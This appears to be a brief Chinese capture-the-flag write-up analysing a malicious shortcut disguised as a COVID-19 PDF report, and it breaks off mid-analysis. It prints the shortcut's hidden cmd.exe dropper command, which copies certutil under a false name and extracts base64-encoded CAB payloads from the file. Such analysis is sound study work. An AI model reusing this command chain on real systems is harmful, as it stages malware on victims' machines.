babypdf
附件是一个快捷方式,但是打开是可以成功的看到pdf的,这就肯定是从外面加载进来的
看一下目标
%SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y&findstr.exe "TVNDRgAAAA" %tmp%\\g4ZokyumBB2gDn.tmp>%tmp%\\cSi1r0uywDNvDu.
在tmp目录下找到g4ZokyumBB2gDn.tmp
有两段base64
上下两段解出来都是MSCF文件头,是后缀为cab的归档文件
第一个打不开,第二个打开出现了他加载的pdf
然后再tmp文件里面找到了这个